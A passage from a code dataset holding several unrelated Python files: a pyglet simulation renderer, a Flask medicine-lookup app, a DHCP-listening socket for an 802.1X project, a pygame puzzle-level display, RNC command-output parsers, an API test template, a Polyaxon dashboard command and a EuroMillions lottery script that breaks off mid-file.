255,\n 255, 250]),\n ('c3B', (249, 86, 86) * 4,)) # color\n\n def render(self, H_prediction, target):\n self.Y_t = H_prediction\n self._update_arm(H_prediction, target)\n self.switch_to()\n self.dispatch_events()\n self.dispatch_event('on_draw')\n self.flip()\n # print(self.goal_info['h'])\n\n def on_draw(self):\n self.clear()\n self.batch.draw()\n\n def _update_arm(self, H_prdiction, target):\n # update goal\n\n self.goal.vertices = (\n 100, 100 + target * 10,\n 100, 105 + target * 10,\n 300, 105 + target * 10,\n 300, 100 + target * 10)\n\n # update arm\n #height = self.Y_t\n #print(H_prdiction)\n self.arm1.vertices = (\n 195, 100 + H_prdiction * 10,\n 195, 105 + H_prdiction * 10,\n 205, 105 + H_prdiction * 10,\n 205, 100 + H_prdiction * 10)\n\nif __name__ == '__main__':\n env = Welding_Env()\n while True:\n print(\"new epoch\")\n s = env.reset()\n for i in range(100):\n env.render()\n env.step(env.sample_action())\n time.sleep(0.01)\n\n\n\n\n\n","sub_path":"New_env.py","file_name":"New_env.py","file_ext":"py","file_size_in_byte":6124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"213187909","text":"import psycopg2\r\nimport psycopg2.extras\r\n\r\nfrom flask import Flask, redirect, url_for, request, render_template\r\napp = Flask(__name__)\r\n\r\n@app.route('/success/')\r\ndef success(name):\r\n conn = None\r\n try:\r\n print('Connecting to the PostgreSQL database...')\r\n conn = psycopg2.connect(host=\"localhost\",database=\"postgres\", user=\"postgres\", password=\"poojasvi\")\r\n # create a cursor\r\n cur = conn.cursor()\r\n print(\"Connection established\")\r\n\r\n except (Exception, psycopg2.DatabaseError) as error:\r\n print(error) \r\n\r\n try:\r\n # execute a statement\r\n # a=\"RHAFUVJTG\"\r\n a=name\r\n sql = \"\"\"SELECT \"Quantity\" FROM medicines WHERE \"Medicine\" = %s ; \"\"\"\r\n # cur.execute(sql)\r\n cur.execute(sql,(a,))\r\n print(\"select executed\")\r\n print(cur.rowcount)\r\n res=cur.fetchone()[0]\r\n print(res)\r\n \r\n conn.commit()\r\n \r\n except (Exception, psycopg2.DatabaseError) as error:\r\n print(error)\r\n\r\n finally:\r\n cur.close()\r\n if conn is not None:\r\n conn.close()\r\n print('Database connection closed.') \r\n # return str(res)\r\n return render_template('get_med_qty.html', qty = str(res), e=1)\r\n\r\n@app.route('/med',methods = ['POST', 'GET'])\r\ndef med():\r\n if request.method == 'POST':\r\n med = request.form['med']\r\n return redirect(url_for('success',name = med))\r\n else:\r\n med = request.form['med']\r\n return redirect(url_for('success',name = med))\r\n\r\nif __name__ == '__main__':\r\n app.run(debug = True)","sub_path":"get_med_qty.py","file_name":"get_med_qty.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"366530624","text":"\"\"\"Handle activity that is not EAP on the same EAP interface\"\"\"\n\nimport struct\nfrom fcntl import ioctl\nfrom eventlet.green import socket\n\nfrom chewie.mac_address import MacAddress\n\nclass ActivitySocket:\n \"\"\"Handle the RADIUS socket\"\"\"\n SIOCGIFINDEX = 0x8933\n PACKET_MR_PROMISC = 1\n IP_ETHERTYPE = 0x0800\n SOL_PACKET = 263\n PACKET_ADD_MEMBERSHIP = 1\n\n DHCP_UDP_SRC = 68\n DHCP_UDP_DST = 67\n UDP_IPTYPE = b'\\x11'\n EAP_ADDRESS = MacAddress.from_string(\"01:80:c2:00:00:03\")\n\n def __init__(self, interface_name):\n self.socket = None\n self.interface_name = interface_name\n self.interface_index = None\n\n def setup(self):\n \"\"\"Set up the socket\"\"\"\n self.open()\n self.get_interface_index()\n self.set_interface_promiscuous()\n\n def send(self, data):\n \"\"\"Not Implemented -- This socket is purely for Listening\"\"\"\n raise NotImplementedError('Attempted to send data down the activity socket')\n\n def receive(self):\n \"\"\"Receive activity from supplicant-facing socket\"\"\"\n # Skip all packets that are not DHCP requests\n while True:\n ret_val = self.socket.recv(4096)\n\n if ret_val[23:24] == self.UDP_IPTYPE:\n src_port = struct.unpack('>H', ret_val[34:36])[0]\n dst_port = struct.unpack('>H', ret_val[36:38])[0]\n\n if src_port == self.DHCP_UDP_SRC and dst_port == self.DHCP_UDP_DST:\n return ret_val\n\n def open(self):\n \"\"\"Listen on the Socket for any form of Eth() / IP() frames \"\"\"\n self.socket = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, # pylint: disable=no-member\n socket.htons(self.IP_ETHERTYPE)) # pylint: disable=no-member\n self.socket.bind((self.interface_name, 0))\n\n def get_interface_index(self):\n \"\"\"Get the interface index of the Socket\"\"\"\n # http://man7.org/linux/man-pages/man7/netdevice.7.html\n request = struct.pack('16sI', self.interface_name.encode(\"utf-8\"), 0)\n response = ioctl(self.socket, self.SIOCGIFINDEX, request)\n _ifname, self.interface_index = struct.unpack('16sI', response)\n\n def set_interface_promiscuous(self):\n \"\"\"Sets the activity interface to be able to receive messages with port_id in mac_dst\"\"\"\n request = struct.pack(\"IHH8s\", self.interface_index, self.PACKET_MR_PROMISC,\n len(self.EAP_ADDRESS.address), self.EAP_ADDRESS.address)\n\n self.socket.setsockopt(self.SOL_PACKET, self.PACKET_ADD_MEMBERSHIP, request)\n","sub_path":"chewie/activity_socket.py","file_name":"activity_socket.py","file_ext":"py","file_size_in_byte":2595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"551071272","text":"# Copyright 2014 by Ethan Fritz. All Rights Reserved.\r\n\r\n\r\nclass Sound:\r\n def __init__(self, sound, text, image):\r\n self.sound = sound\r\n self.text = text\r\n self.image = image\r\n\r\n#\r\n# Constants\r\n#\r\nSOUNDS = [Sound('sfx/vroom.wav', 'Vroom', 'images/vroom.png'),\r\n Sound('sfx/screech.wav', 'Screech', 'images/screech.png')]\r\n\r\n\r\ndef get_sound_by_id(id):\r\n for sound in SOUNDS:\r\n if sound.id == id:\r\n return sound\r\n\r\n return None\r\n","sub_path":"core/sound.py","file_name":"sound.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"361484119","text":"# -*- coding : utf-8 -*-\n\n#------------------------------------------------------------------------\n# LIB IMPORT\n#------------------------------------------------------------------------\n\nimport eventHandler\nimport pygame\nimport loading\nfrom pygame.locals import *\nfrom classes.box import Box\nfrom classes.cell import Cell\nfrom classes.scrolls import Scrolls\nfrom classes.level import Level\nfrom classes.player import Player\n\n#------------------------------------------------------------------------\n# GLOBAL VARIABLE\n#------------------------------------------------------------------------\n\n\"\"\"\n\n:firstPixel: the first pixel of the width where the game (and not the screen) has to be displayed\n:playerAction: action that the player chooses in the titleScreen : string\n\n\"\"\"\n\nfirstPixel = None\nplayerAction = None\n\n#------------------------------------------------------------------------\n# METHODS\n#------------------------------------------------------------------------\n\ndef displayTitleScreen(titleScreenImgPath, window):\n \"\"\"Method where I set how the title screen is displayed \"\"\"\n\n playerAction = \"\"\n\n #Setting the image for the title screen\n #window = pygame.display.set_mode((640,480))\n titleScreen = pygame.image.load(titleScreenImgPath).convert()\n window.blit(titleScreen, (0,0))\n\n #Setting the new game button for the title screen\n \"\"\"newGame = pygame.image.load(\"resources/img/new_game_resized.png\").convert()\n window.blit(newGame, (320, 240))\"\"\"\n pygame.display.flip()\n\n continuer = 1\n\n #Display the title screen as long as the player presses wrong key\n while continuer:\n for event in pygame.event.get():\n \n if event.type == KEYDOWN: \n playerAction = eventHandler.eventTitleScreen(event)\n continuer = loading.exitTitleScreen(playerAction)\n \n elif event.type == QUIT:\n playerAction = \"Quit_the_game\"\n continuer = 0\n\n return playerAction\n \ndef displayGrille(level, firstPixel, window):\n \"\"\"We place all elements on the table\n\n Attributes:\n :firstPixel: first pixel to display on the width of the screen to get the game centered in the window\n :window: pygame.Surface object where the game is displayed\n \"\"\"\n\n for row in level._get_grille():\n for cell in row:\n if cell.element is not None:\n pos_x = firstPixel + (cell.pos_x * 30)\n pos_y = cell.pos_y * 30\n elementPNG = pygame.image.load(cell.element.skin).convert_alpha()\n window.blit(elementPNG, (pos_x, pos_y))\n\n else:\n pass\n\n \ndef displayLevel(numLevel, window):\n \"\"\"Display the level the player has selected \"\"\"\n print(\"Chargement du niveau \"+str(numLevel))\n loadLevel = True\n\n #While we need to reload the same level (for restart or a death for example)\n #We reload it\n while loadLevel == True:\n #String that will go back to main and let the program knows what to do next\n #Go to next level? Quit the game?\n action = \"\"\n \n #We create the object Level and load its elements\n level = Level(numLevel)\n\n #If it couldn't find a level in levelFile, it means the game is finished and\n #we display the title screen\n if level.csvPath is None:\n return \"Title_Screen\"\n else:\n level.loadingLevelForDisplay()\n\n #We calculate where should be the center of the game on the screen in order\n #to display correctly all elements\n gameWidth = len(level._get_grille()[0]) * 30\n firstPixel = centerTheGameOnTheScreen(window.get_width(), gameWidth)\n\n #We set a new background image\n window.fill(pygame.Color(\"black\"))\n background = pygame.image.load(\"resources/img/fond.jpg\").convert()\n window.blit(background, (firstPixel,0))\n pygame.display.flip()\n\n #We place each element with their pixels position on the screen\n displayGrille(level, firstPixel, window)\n\n #We place the player on the table\n player = Player()\n playerPNG = pygame.image.load(player.character.skin).convert_alpha()\n player.positionRect = playerPNG.get_rect(x = level.start[0], y = level.start[1])\n \n window.blit(playerPNG, (firstPixel+player.positionRect.x*30, player.positionRect.y*30))\n pygame.display.flip()\n \n continuer = 1\n\n #We display the level while the player hasn't finished it\n while continuer:\n\n #We display background and elements of the level again\n window.fill(pygame.Color(\"Black\"))\n\n #We load the background image\n window.blit(background, (firstPixel,0))\n\n #We load the table of elements with their graphics\n displayGrille(level, firstPixel, window)\n\n #We load the player character (donkey kong)\n playerPNG = pygame.image.load(player.character.skin).convert_alpha()\n window.blit(playerPNG, (firstPixel + player.positionRect.x * 30, player.positionRect.y*30))\n\n #If the player walked on a scroll, we display its message\n level.checkPlayerOnScroll(player, window)\n\n pygame.display.flip()\n \n for event in pygame.event.get():\n if event.type == QUIT:\n action = \"Quit_the_game\"\n loadLevel = False\n continuer = 0\n\n #If the player presses a key, we check if he can move\n elif event.type == KEYDOWN:\n if event.key == K_r:\n continuer = 0\n elif event.key == K_LEFT or event.key == K_RIGHT or event.key == K_UP or event.key == K_DOWN:\n #If the player will move on a cell where there is a box\n potentialBox = level.checkPlayerBoxes(player, event)\n if potentialBox is not None:\n box = potentialBox\n if box.canMove(player, level, event):\n player.move(level, event)\n\n else:\n player.move(level, event)\n\n #If the player dies, he goes back to the starting point of the current level\n if level.checkPlayerDies(player):\n continuer = 0\n \n #If player walks on the finish line, he goes to next level\n if level.checkEndLevel(player):\n continuer = 0\n loadLevel = False\n action = \"Next_level\"\n\n return action\n \n\n\ndef displayLevelSelection(window):\n \"\"\"Screen where all the levels unlocked are listed \"\"\"\n numberOfLevels = loading.howManyLevels()\n\n for x in range(0, numberOfLevels):\n messageFont = pygame.font.SysFont(\"comicsansms\", 18)\n messageRender = messageFont.render(\"Niveau \"+str(x+1), True, (255,255,255))\n window.blit(messageRender, (0,450))\n pygame.display.flip()\n \n\ndef centerTheGameOnTheScreen(windowWidth, gameWidth):\n \"\"\"Method that calculates where the first pixel of the width of the game\n has to be in order to have the game centered on the screen\n\n Attributes:\n :windowWidth: width of the window : int\n :gameWidth: width of the game : int \n \"\"\"\n\n blankSpace = windowWidth - gameWidth\n firstPixel = blankSpace / 2\n \n return firstPixel\n\n \n","sub_path":"displayDK.py","file_name":"displayDK.py","file_ext":"py","file_size_in_byte":7706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"307991978","text":"import re\nimport datetime\nfrom models.db_tables import PmrReport\n\nRE_FINGERPRINT = re.compile(r'Licensing=.+fingerprint +(\\w+)')\nRE_NODE_NAME = re.compile(r'\\S+ = (.+)')\nRE_PRODUCT_NAME = re.compile(r'productName +(.+)')\nRE_RNC_CAPACITY = re.compile(r'(MO .+|Object .+|Licensing=.+)')\nRE_PM_CAPACITY = re.compile(r'Licensing=1\\D+([\\d,]+)\\s+(\\d+)')\nRE_SUBRACKS = re.compile(r'Subrack=(.+)')\nRE_SUBRACK_SLOT = re.compile(r'Subrack=(.+),Slot=(\\d{1,2})')\nRE_SLOT_STATE = re.compile(r'(MO .+|Subrack=.+)')\nRE_DEVICE_STATE = re.compile(r'((?:Type|PDR|CC|DC).+)')\nRE_ETHERNET_PORT = re.compile(r'Subrack=(.+),Slot=(\\d{1,2}),.+Port=(\\d).+\\((\\w+)')\nRE_LOAD_CONTROL = re.compile(r'((?:Object |Subrack=).+)')\nRE_LOAD_CONTROL_ENTRY = re.compile(r'Subrack=(.+),Slot=(\\d{1,2}),.+LoadControl=1\\s+(.+)')\nRE_PMR_REPORT_PART = re.compile(r'(?:Object\\s+Counter|Date\\s+Time\\s+Counter).+', re.M)\nRE_PMR_REPORT_ENTRY = re.compile(r'^(?P.+)\\s+(?P(?:Mp|Cc|Dc|Pdr)Load|UsedCapacity)\\s+(?P.+)', re.M)\nRE_PMR_REPORT_START = re.compile(r'\\s?\\d{1,3}\\)\\sRNC\\s')\nRE_LKRA = re.compile(r'(?:Sr|[ME]S).+')\nRE_LKRA_ENTRY = re.compile(\n r'(?P^[ME]S\\d?)\\s+(?P\\d+)\\s+(?P\\S+)\\s+(?P[\\w\\d]+)?\\s+(?P\\d+)\\s+(?P\\d+)\\s+(?P\\d+)\\s+(?P\\d+)')\n\nCURRENT_CAPACITY = 'currentCapacityLimit'\n\n\ndef get_fingerprint(cmd_printout):\n return RE_FINGERPRINT.findall(cmd_printout)[0]\n\n\ndef get_nodeName(cmd_printout):\n try:\n return RE_NODE_NAME.findall(cmd_printout)[0]\n except IndexError:\n return None\n\n\ndef get_productName(cmd_printout):\n try:\n return RE_PRODUCT_NAME.findall(cmd_printout)[0]\n except IndexError:\n return None\n\n\ndef get_rncCapacity(cmd, cmd_printout):\n rncCapacity = {}\n attributes = []\n re_cmd_printout = RE_RNC_CAPACITY.findall(cmd_printout)\n for i in range(len(re_cmd_printout)):\n if i == 0:\n attributes = re_cmd_printout[i].split()[1:]\n else:\n record = re.sub(r'\\(|\\)', '', re_cmd_printout[i].strip('Licensing=1,RncCapacity=')).split()\n k = record[0]\n if CURRENT_CAPACITY in cmd:\n v = dict(zip(attributes, record[2:]))\n else:\n v = dict(zip(attributes, record[1:]))\n rncCapacity.update({k: v})\n return rncCapacity\n\n\ndef get_slotState(slots, cmd_printout):\n re_cmd_printout = RE_SLOT_STATE.findall(cmd_printout)\n for i in range(len(re_cmd_printout)):\n if i == 0:\n # attributes = re_cmd_printout[i].split()[1:]\n pass\n else:\n slotState = re.sub(r'\\(|\\)', '', re_cmd_printout[i].split()[-1])\n board = re_cmd_printout[i].split()[0]\n attribute = re_cmd_printout[i].split()[1]\n subrack, slot = RE_SUBRACK_SLOT.findall(board)[0]\n if subrack not in slots.keys():\n slots.update({subrack: {}})\n if slot not in slots.get(subrack).keys():\n slots.get(subrack).update({slot: {}})\n slots.get(subrack).get(slot).update({attribute: slotState})\n\n\ndef get_deviceState(cmd_printout):\n re_cmd_printout = RE_DEVICE_STATE.findall(cmd_printout)[-4:]\n deviceStates = {}\n attributes = []\n for i in range(len(re_cmd_printout)):\n if i == 0:\n s = re.sub('%|\\(.\\)', '', re_cmd_printout[i])\n attributes = s.split()[1:]\n else:\n entry = re_cmd_printout[i].split()\n k = entry[0]\n v = dict(zip(attributes, entry[1:]))\n if k not in deviceStates.keys():\n deviceStates.update({k: {}})\n deviceStates.get(k).update(v)\n return deviceStates\n\n\ndef get_ethernet_speed(cmd_printout):\n re_cmd_printout = RE_ETHERNET_PORT.findall(cmd_printout)\n ports = {}\n for i in range(len(re_cmd_printout)):\n port = '-'.join(re_cmd_printout[i][:-1])\n speed = re_cmd_printout[i][-1]\n ports.update({port: speed})\n return ports\n\n\ndef get_loadcontrol(cmd_printout):\n re_cmd_printout = RE_LOAD_CONTROL.findall(cmd_printout)\n result = {}\n attributes = []\n for i in range(len(re_cmd_printout)):\n if i == 0:\n attributes = re_cmd_printout[i].split()[1:]\n else:\n entry = re_cmd_printout[i]\n subrack, slot, counters = RE_LOAD_CONTROL_ENTRY.findall(entry)[0]\n slot = int(slot)\n counters = counters.split()\n if subrack not in result.keys():\n result.update({subrack: {}})\n if slot not in result.get(subrack).keys():\n result.get(subrack).update({slot: {}})\n result.get(subrack).get(slot).update(dict(zip(attributes, counters)))\n return result\n\n\ndef get_lkra(cmd_printout):\n cell_repartition = 'Cell repartition by '\n repartion_by = ''\n lkra = {}\n result = {}\n\n for line in cmd_printout.splitlines():\n if cell_repartition in line:\n repartion_by = re.sub('{0}|{1}'.format(cell_repartition, ':'), '', line)\n if repartion_by not in lkra.keys():\n lkra.update({repartion_by: []})\n continue\n if repartion_by and RE_LKRA.findall(line):\n lkra.get(repartion_by).append(line)\n\n byRncModule = lkra.get('rncModule')\n column_names = byRncModule[0].split()[2:]\n\n for line in byRncModule[1:]:\n subrack, module = RE_LKRA_ENTRY.search(line).groups()[0:2]\n values = RE_LKRA_ENTRY.search(line).groups()[2:]\n module = int(module)\n values = [int(i) if i and i.isdigit() else i for i in values]\n if subrack not in result.keys():\n result.update({subrack: {}})\n if module not in result.get(subrack).keys():\n result.get(subrack).update({module: {}})\n result.get(subrack).get(module).update(dict(zip(column_names, values)))\n\n return result\n\n\ndef get_pmr(cmd_printout):\n\n def get_max_sum(*args):\n max_sum = max(sum(filter(None, j)) for j in map(None, *args[0]))\n if result[report_name]['max'] < max_sum:\n result[report_name]['max'] = max_sum\n for j in map(None, *args[0]):\n if sum(filter(None, j)) == max_sum:\n result[report_name]['v'] = list(j)\n if not result.get(report_name).get('devices'):\n result[report_name]['devices'] = devices\n\n def get_max_value(*args):\n try:\n result.update(dict(zip(args[1], [{'max': 0.0, 'v': []}, {'max': 0.0, 'v': []}])))\n m = {}\n vals = {}\n m.update(dict(zip(args[1], [max(filter(None, j)) for j in map(None, *args[0])])))\n vals.update(dict(zip(args[1], map(None, *args[0]))))\n time = [datetime.datetime.strptime(dt, '%Y-%m-%d %H:%M').time() for dt in args[2]][:24]\n for k in args[1]:\n time_sorted, vals_sorted = zip(*sorted(zip(time, vals.get(k))))\n time_hm = [hm.strftime(format='%H:%M') for hm in time_sorted]\n result.get(k).update({'max': m.get(k), 'v': list(vals_sorted), 'time': time_hm})\n except ValueError:\n result.update(dict(zip(args[1], [{'max': 0, 'v': '', 'time': ''}, {'max': 0, 'v': '', 'time': ''}])))\n\n result.pop(report_name)\n\n def get_device(d):\n if re_mp.findall(d):\n sr, sl = re_mp.search(d).groups()\n d = '-'.join([sr.replace('-', ''), sl])\n elif re_dev.findall(d):\n dev, srsl = re_dev.search(d).groups()\n d = '-'.join([srsl, dev])\n return d\n\n result = {}\n report_name = ''\n headers = []\n entry = []\n devices = []\n\n re_mp = re.compile(r'(?P[ME].+),Slot=(?P\\d+)')\n re_dev = re.compile(r'(?:Cc|Dc|Pdr)Device=(?P\\d+)\\s\\((?P.+)\\)')\n\n report_processors = {\n 'MpLoad': ['devices', get_max_sum, re_mp], 'CcLoad': ['devices', get_max_sum], 'DcLoad': ['devices', get_max_sum],\n 'PdrLoad': ['devices', get_max_sum], 'UsedCapacity': ['time', get_max_value]}\n\n for line in cmd_printout.splitlines():\n if line and RE_PMR_REPORT_PART.findall(line):\n headers = RE_PMR_REPORT_PART.findall(line)[0]\n continue\n\n if line and RE_PMR_REPORT_ENTRY.search(line):\n (device, report_name, values) = RE_PMR_REPORT_ENTRY.search(line).groups()\n device = get_device(device)\n if report_name not in result.keys():\n result.update({report_name: {'max': 0.0, 'v': [], report_processors.get(report_name)[0]: ''}})\n v = []\n v.extend(0.0 if i == 'N/A' else float(i) for i in values.split())\n entry.append(v)\n devices.append(device)\n continue\n\n if entry:\n headers = headers.split()[3:]\n report_processors.get(report_name)[1](entry, headers, devices)\n entry = []\n devices = []\n headers = ''\n\n pmr_todb = {\n 'IubThroughput': [PmrReport.IubThroughput.db_column, PmrReport.vIub.db_column, PmrReport.tIub.db_column],\n 'FachDchHsUsers': [PmrReport.FachDchHsUsers.db_column, PmrReport.vUsers.db_column, PmrReport.tUsers.db_column],\n 'MpLoad': [PmrReport.MpLoad.db_column, PmrReport.vMpLoad.db_column, PmrReport.dMpLoad.db_column],\n 'CcLoad': [PmrReport.CcLoad.db_column, PmrReport.vCcLoad.db_column, PmrReport.dCcLoad.db_column],\n 'DcLoad': [PmrReport.DcLoad.db_column, PmrReport.vDcLoad.db_column, PmrReport.dDcLoad.db_column],\n 'PdrLoad': [PmrReport.PdrLoad.db_column, PmrReport.vPdrLoad.db_column, PmrReport.dPdrLoad.db_column]}\n\n for k, v in pmr_todb.items():\n try:\n if result.get(k).get('devices') and result.get(k).get('v'):\n d_sorted, v_sorted = zip(*sorted(zip(result.get(k).get('devices'), result.get(k).get('v'))))\n result.update(\n dict(zip(v, [result.get(k).get('max'), list(v_sorted), list(d_sorted)])))\n elif result.get(k).get('devices'):\n result.update(\n dict(zip(v, [result.get(k).get('max'), result.get(k).get('v'), result.get(k).get('devices')])))\n\n else:\n result.update(\n dict(zip(v, [result.get(k).get('max'), result.get(k).get('v'), result.get(k).get('time')])))\n\n except AttributeError:\n result.update(dict(zip(v, [0.0, '', ''])))\n\n return result\n","sub_path":"modules/command_parsers.py","file_name":"command_parsers.py","file_ext":"py","file_size_in_byte":10386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"360530806","text":"import pytest\nimport requests\n\n\ndef test_swagger():\n\n model_endpoint = 'http://localhost:5000/swagger.json'\n\n r = requests.get(url=model_endpoint)\n assert r.status_code == 200\n assert r.headers['Content-Type'] == 'application/json'\n\n json = r.json()\n assert 'swagger' in json\n assert json.get('info') and json.get('info').get('title') == 'Model Asset Exchange Server'\n\n\ndef test_metadata():\n\n model_endpoint = 'http://localhost:5000/model/metadata'\n\n r = requests.get(url=model_endpoint)\n assert r.status_code == 200\n\n metadata = r.json()\n assert metadata['id'] == 'ADD IN MODEL ID'\n assert metadata['name'] == 'ADD MODEL NAME'\n assert metadata['description'] == 'ADD MODEL DESCRIPTION'\n assert metadata['license'] == 'ADD MODEL LICENSE'\n\n\ndef test_response():\n model_endpoint = 'http://localhost:5000/model/predict'\n file_path = 'assets/SAMPLE_FILE.jpg'\n\n with open(file_path, 'rb') as file:\n file_form = {'image': (file_path, file, 'image/jpeg')}\n\n r = requests.post(url=model_endpoint, files=file_form)\n\n assert r.status_code == 200\n response = r.json()\n\n assert response['status'] == 'ok'\n\n # add sanity checks here\n\n\nif __name__ == '__main__':\n pytest.main([__file__])\n","sub_path":"tests/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"111467765","text":"#!/usr/bin/python\n#\n# Copyright 2018-2022 Polyaxon, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport sys\n\nimport click\n\nfrom polyaxon import settings\nfrom polyaxon.api import POLYAXON_CLOUD_HOST\nfrom polyaxon.logger import clean_outputs\nfrom polyaxon.utils.formatting import Printer\nfrom polyaxon.utils.http_utils import clean_host\n\n\ndef get_dashboard_url(\n base: str = \"ui\", subpath: str = \"\", use_cloud: bool = False\n) -> str:\n host = POLYAXON_CLOUD_HOST if use_cloud else clean_host(settings.CLIENT_CONFIG.host)\n dashboard_url = \"{}/{}/\".format(host, base)\n if subpath:\n return \"{}{}/\".format(dashboard_url, subpath.rstrip(\"/\"))\n return dashboard_url\n\n\ndef get_dashboard(dashboard_url: str, url_only: bool, yes: bool):\n if url_only:\n Printer.print_header(\"The dashboard is available at: {}\".format(dashboard_url))\n sys.exit(0)\n if yes or click.confirm(\n \"Dashboard page will now open in your browser. Continue?\",\n default=True,\n ):\n click.launch(dashboard_url)\n\n\n@click.command()\n@click.option(\n \"--yes\",\n \"-y\",\n is_flag=True,\n default=False,\n help=\"Automatic yes to prompts. \"\n 'Assume \"yes\" as answer to all prompts and run non-interactively.',\n)\n@click.option(\n \"--url\", is_flag=True, default=False, help=\"Print the url of the dashboard.\"\n)\n@clean_outputs\ndef dashboard(yes, url):\n \"\"\"Open dashboard in browser.\"\"\"\n get_dashboard(dashboard_url=get_dashboard_url(), url_only=url, yes=yes)\n","sub_path":"core/polyaxon/cli/dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"3816632","text":"import random\r\n# VARIABLES GLOBALES\r\n###################################\r\n\r\n########################################################\r\n# FUNCIONES\r\n########################################################\r\n# funcion para introducir numeros\r\ndef introducirNumero():\r\n while True:\r\n try:\r\n numero = int(input(\"Por favor ingrese un número: \"))\r\n return numero\r\n break\r\n except ValueError:\r\n print(\"Oops! No era válido. Intente nuevamente...\")\r\n# fin funcion ########################################################\r\n\r\n# funcion para comprobar repetidos en array\r\ndef comprobarRepetidosArrayNumero(arrayComp , numero):\r\n comp = False\r\n for elemento in arrayComp:\r\n if elemento == numero:\r\n comp = True\r\n return comp\r\n# fin funcion ########################################################\r\n\r\n# funcion para introducir mi apuesta\r\ndef introducirMiApuestaMultiple():\r\n # introducir tus numeros de euromillon\r\n print('Introduce tus numeros de euromillon. Pueden de 5 a 10 y no deben ser negativos, ni 0 ni mayor de 50')\r\n print('Introduce el numero de numeros de euromillon que quieres apostar')\r\n numeroApuestasNumero = introducirNumero()\r\n contadorNumerosPrimitiva = 1\r\n miPrimitiva = []\r\n miNumero = 0\r\n # ponemos numeros primitiva\r\n while contadorNumerosPrimitiva < (numeroApuestasNumero + 1):\r\n # ponemos el numero\r\n print('Escribe el numero ' + str(contadorNumerosPrimitiva))\r\n miNumero = introducirNumero()\r\n if miNumero < 1 or miNumero > 50:\r\n print('El número no es valido')\r\n else:\r\n if contadorNumerosPrimitiva == 1:\r\n miPrimitiva.append(miNumero)\r\n contadorNumerosPrimitiva = contadorNumerosPrimitiva + 1\r\n print('Numero introducido correctamente')\r\n else:\r\n # si es false el numero no esta repetido\r\n if comprobarRepetidosArrayNumero(miPrimitiva,miNumero) == False:\r\n miPrimitiva.append(miNumero)\r\n contadorNumerosPrimitiva = contadorNumerosPrimitiva + 1\r\n print('Numero introducido correctamente')\r\n else: # y si esta repetido\r\n print('El número está repetido')\r\n\r\n\r\n # introducir tus series o estrellas de euromillon\r\n print('Introduce tus series o estrellas de euromillon. Son de 2 a 5 y no deben ser negativos, ni 0 ni mayor de 12')\r\n print('Introduce el numero de series de euromillon que quieres apostar')\r\n numeroApuestasSeries = introducirNumero()\r\n contadorSeriesPrimitiva = 1\r\n misSeries = []\r\n miSerie = 0\r\n # ponemos numeros primitiva\r\n while contadorSeriesPrimitiva < (numeroApuestasSeries + 1):\r\n # ponemos el numero\r\n print('Escribe el numero de serie ' + str(contadorSeriesPrimitiva))\r\n miSerie = introducirNumero()\r\n if miSerie < 1 or miSerie > 12:\r\n print('El número de serie no es valido')\r\n else:\r\n if contadorSeriesPrimitiva == 1:\r\n misSeries.append(miSerie)\r\n contadorSeriesPrimitiva = contadorSeriesPrimitiva + 1\r\n print('Numero de serie introducido correctamente')\r\n else:\r\n # si es false el numero no esta repetido\r\n if comprobarRepetidosArrayNumero(misSeries,miSerie) == False:\r\n misSeries.append(miSerie)\r\n contadorSeriesPrimitiva = contadorSeriesPrimitiva + 1\r\n print('Numero introducido correctamente')\r\n else: # y si esta repetido\r\n print('El número de serie está repetido')\r\n\r\n\r\n miApuesta = [miPrimitiva,misSeries]\r\n # imprimir mis numeros\r\n print(\"Tus numeros de euromillon son = \" + str(miPrimitiva[0]) + \" - \" + str(miPrimitiva[1]) + \" - \" + str(miPrimitiva[2]) + \" - \" + str(miPrimitiva[3]) + \" - \" + str(miPrimitiva[4]))\r\n # imprimir mis numeros\r\n print(\"Tus series o estrellas de euromillon son = \" + str(misSeries[0]) + \" - \" + str(misSeries[1]))\r\n\r\n return miApuesta\r\n# fin funcion ########################################################\r\n\r\n\r\n# funcion para generar resultados euromillon\r\ndef crearResultadosEuromillon():\r\n print('Cuantas euromillones quieres crear para comparar tus numeros')\r\n numPrim = int(input('Escribe el numero de euromillones = '))\r\n contEuroMillones = 1\r\n numeroAleatorio = 0\r\n arrayNumerosEuroMillon = []\r\n NumerosEuroMillon = []\r\n\r\n arraySeriesEuroMillon = []\r\n SeriesEuroMillon = []\r\n\r\n # creo numeros euromillones\r\n for i in range(0, numPrim):\r\n while contEuroMillones < 6:\r\n numeroAleatorio = random.randint(1, 50)\r\n # todo esto es para comprobar que cada primitiva no tiene numeros repetidos\r\n if contEuroMillones == 1:\r\n NumerosEuroMillon.append(numeroAleatorio)\r\n contEuroMillones = contEuroMillones + 1\r\n else:\r\n # si es false el numero no esta repetido\r\n if comprobarRepetidosArrayNumero(NumerosEuroMillon,numeroAleatorio) == False:\r\n NumerosEuroMillon.append(numeroAleatorio)\r\n contEuroMillones = contEuroMillones + 1\r\n\r\n contEuroMillones = 1\r\n\r\n #######################################\r\n # print('EUROMILLON NUMEROS ' + str(i+1))\r\n # for j in range(len(NumerosEuroMillon)):\r\n # print(NumerosEuroMillon[j], end=' ')\r\n # print()\r\n\r\n #######################################\r\n # pongo 